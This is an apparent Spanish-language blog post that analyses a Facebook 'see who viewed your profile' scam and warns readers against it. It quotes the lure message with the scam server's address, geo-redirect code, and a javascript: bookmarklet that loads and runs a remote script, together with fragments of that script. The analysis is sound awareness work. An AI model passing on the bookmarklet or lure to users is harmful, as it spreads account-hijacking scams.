Analizando aplicación sospechosa. [Ver quién ve tu perfil]

Post para todos aquellos que usan facebook y le están dando a "ver quién ve tu perfil" o clickando en enlaces de las páginas como "WOW ahora facebook le permite ver quién ve tu perfil!":

He visto que esta mañana en el facebook había bastante gente con algo así:

Catálogo Mi Perfil Visualizadores:

nombre apellido1 apellido2 - 1136 vistas

nombre apellido1 apellido2 - 983 vistas

nombre apellido1 apellido2 - 542 vistas

nombre apellido1 apellido2 - 300 vistas n Descubre a quién visto tu perfil @ http://216.119.148.83/spy.php

Para empezar, en mi opinión a facebook no le interesa que sepamos ni quién nos visita ni cuántas veces lo hace, es el morbo que tiene esto de las redes sociales, a parte de poder estar en contacto con tus amigos y blablabla lo que hacemos todos es cotillear a la gente sin que lo sepan ,vamos cotilleando de amigo/a en amigo/a como si fuéramos invisibles. Es más, ¿Creéis que si a facebook le interesara mostrarnos quién, cuándo y cuántas veces nos visita alguien no lo habría hecho ya?

¿Dónde quiero llegar con todo esto? Sencillo, tan sólo quiero intentar mentalizar a la gente de que desconfíe con eventos del tipo de que si no clickas aquí se te cerrará facebook, que si no clickas allá ahora el facebook se hará de pago y tendremos que pagar a partir de tal fecha, que si clickas por allí podrás ver las visitas a tu perfil, y un largo etc. Para ello he hecho el siguiente análisis para que veáis que la mayoría de eventos de este tipo sólo son mas que engaños. Además, si facebook hace algún cambio importante tranquilos que ya se encargarán ellos de avisarnos.

Bueno, después de este pequeño inciso, continuo:

Iba diciendo que esta mañana he visto a unos cuantos amiguetes que han hecho caso a eso de:

Descubre a quién visto tu perfil @ http://216.119.148.83/spy.php

Como me ha parecido un poco sospechoso me he puesto a investigar.

He empezado activando NoScript (una extensión muy recomendada para Mozilla Firefox) para evitar sustos, ya que suponiendo que sea una url maligna no seria de extrañar que haya algún script con malas intenciones en el código. [llámenme paranoico si quieren...  al menos no voy enviando 200 peticiones a eventos sin que lo sepa ;) ]

Bien, seguidamente, para protegerme todavía mas, he cerrado la sesión del facebook por si las moscas, ya que soy muy novato y no tengo mucha idea, no vaya a ser que haya alguna otra manera de que puedan conseguir mi csfr. (El csfr, es como nuestro dni, te asignan uno nuevo cada vez que iniciamos sesión en facebook, digamos que es como si nuestro "cuño" para poder entrar a nuestra "discoteca facebook", sin ese cuño no nos dejarían tener acceso a lo que hay dentro del la disco).

Una vez hecho esto, al fin, me he atrevido a entrar en http://216.119.148.83/ y he cotilleado un poco los archivos que tienen alojados en este servidor, primero de todo he ido a analizar el código del archivo spy.php (ya que es esta la dirección a la que nos piden que entremos).

En el código de spy.php se puede observar lo siguiente:

...

  <script language="javascript" src="http://j.maxmind.com/app/geoip.js"></script>

...

var country = geoip_country_code();

...

case (country = "ES"):

  window.location = "http://spanish-landing.blogspot.com/"

...

...

Sólo he copiado parte del código, pero se puede ver que se llama a la función geoip_country_code() del archivo geoip.js para que coja nuestra ip y averigüe de dónde somos y que dependiendo de dónde seamos nos envíe a una dirección u otra, en el caso de que estemos conectados desde España (obviamente, sin utilizar proxys =P) nos envía a un blog en español (he mirado todas las webs que había y lo único que cambiaban una de otra era el idioma de la web).

Como podéis imaginar he entrado en ese blog para ver que había, me he encontrado con una web con nos pedía que copiáramos un script en nuestra barra de direcciones para "para ver quién ha estado acechando a su perfil" (quién ha escrito este blog no debe de ser español, se nota que ha utilizado un traductor a pelo y listo)

El script que nos pide que copiemos y ejecutemos es el siguiente:

javascript:(a=(b=document).createElement('script')).src='//216.24.202.125/s.php?'+Math.random(),b.body.appendChild(a);void(0)

Obviamente yo no lo he hecho, tan sólo me he puesto a analizar que pasaría si copiáramos este script y lo pegáramos en nuestra barra de direcciones como nos pide nuestra querida web que inspira tanta confianza... ejem ejem...

En este código javascript me ha llamado la atención dos cosas: primero que nos manda otra vez al servidor que antes estábamos analizando para que se ejecute el código de 216.24.202.125/s.php?' y en segundo lugar que de parámetro de entrada estuviera esto: Math.random() (un número aleatorio).

Así pues, me he puesto a ver el código fuente de s.php y me he encontrado con esto:

(Os dejo sólo una parte del código:)

...
var test = 'Catálogo Mi Perfil Visualizadores:\x0A'; 
var id = '%tf%    - ' + randomnumber1 + ' vistas,\x0A';
var id1 = '%tf%    - ' + randomnumber2 + ' vistas,\x0A';
var id2 = '%tf%    - ' + randomnumber3 + ' vistas,\x0A';
var id3 = '%tf%    - ' + randomnumber4 + ' vistas,\x0A';
var post = ' Descubre a quién visto tu perfil @ ';
...
var nfriends = 5000;
...

¡Eureka! ¿No os suena?

En una parte del código se puede ver que los nombres son 4 nombres al azar de nuestra lista de contactos y las visitas... para que hablar, el propio nombre de la variable lo dice: RANDOM!!!!! (aleatorio en ingles xD), ahora es cuando nos cuadra que en el script que ejecutábamos hubiera un Math.random(), lo más probable es que sea para a partir de ese número poder generar los 4 números aleatorios de las visitas. (Tan sólo es una suposición.)

(nfriends = 5000 supongo que debe de ser para crear una tabla de 5000 elementos y almacenar en ella 5000 nombres de contactos como máximo)

Otro aspecto importante a nombrar es que los que me han invitado a ese evento habían invitado a todos sus contactos, supongo que, tal y como el script va recorriendo nuestros amigos debe recoger el id de estos y debe de enviarles una petición automática sin nuestra autorización y sin que lo sepamos.

Así que ya sabéis, no os fiéis nada de:

• Los enlaces externos de facebook.
  

• Los eventos que crea la gente diciéndonos que el facebook va a ser de pago, que se va a cerrar el facebook, que vas a poder ver el facebook con coloringos chulis o que vas a saber quién te está visitando.
  

• Algunas de las aplicaciones de entretenimiento que crea la gente, ya que lo que hacen algunas de ellas es enviarte a un enlace externo sin que lo sepas, ¿Y qué acabo de recomendar sobre los enlaces externos...?
  

Y aquí concluyo con mi primer escrito.

Gracias a quien haya leído todo esto y espero que a alguien le haya sido de utilidad.

También quiero pedir perdón si he cometido alguna falta de ortografía o si me estoy equivocando en algo de lo que he dicho, observar que he usado bastante las palabras "supongo que...".

Gracias de nuevo y saludos. =)

p.d: Mientras estaba escribiendo este texto me han llegado DOS invitaciones mas al evento "WOW ahora facebook le permite ver quién ve tu perfil!". No perdáis el tiempo con estas estafas!